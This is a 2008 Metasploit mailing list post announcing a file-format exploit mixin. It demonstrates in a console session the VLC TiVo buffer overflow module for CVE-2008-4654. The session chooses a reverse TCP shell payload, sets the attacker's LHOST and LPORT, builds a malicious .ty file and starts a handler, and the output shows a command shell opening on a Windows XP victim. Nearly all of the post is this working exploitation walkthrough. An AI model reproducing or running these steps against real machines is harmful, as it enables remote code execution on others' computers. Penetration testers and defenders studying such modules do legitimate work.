Metasploit mailing list archives
fileformat exploits.
From: mc at metasploit.com (MC)
Date: Tue, 2 Dec 2008 20:33:56 -0500 (EST)
Just added a small mixin and example exploit that may assist for file format based bugs. Quick demo:

msf > resource /tmp/fileformat_test
resource> use exploit/windows/fileformat/videolan_tivo
resource> info

       Name: VideoLAN VLC TiVo Buffer Overflow
    Version: $Revision:$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  MC <y0 at w00t-shell.net>

Available targets:
  Id  Name
  --  ----
  0   VideoLAN VLC 0.9.4 (XP SP3 English)
  1   VideoLAN VLC 0.9.2 (XP SP3 English)

Basic options:
  Name        Current Setting   Required  Description
  ----        ---------------   --------  -----------
  FILENAME    msf.ty            no        The file name.
  OUTPUTPATH  ./data/exploits/  no        The location of the file.

Payload information:
  Space: 550
  Avoid: 1 characters

Description:
  This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By
  creating a malicious TY file, a remote attacker could overflow a
  buffer and execute arbitrary code.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4654
  http://www.securityfocus.com/bid/31813

resource> set TARGET 1
TARGET => 1
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 172.10.1.100
LHOST => 172.10.1.100
resource> set LPORT 1975
LPORT => 1975
resource> exploit
[*] Handler binding to LHOST 172.10.1.100
[*] Started reverse handler
[*] Creating 'msf.ty' file ...
[*] File 'msf.ty' is located in './data/exploits/' ...
[*] Exploit completed, but no session was created.

msf exploit(videolan_tivo) > resource /tmp/recieve
resource> use exploit/multi/handler
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 172.10.1.100
LHOST => 172.10.1.100
resource> set LPORT 1975
LPORT => 1975
resource> exploit
[*] Handler binding to LHOST 172.10.1.100
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (172.10.1.100:1975 -> 172.10.1.104:1055)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\VideoLAN\VLC>

...the same module exists in modules/exploits/windows/misc/ and can be used via network based attacks.

--
~ mc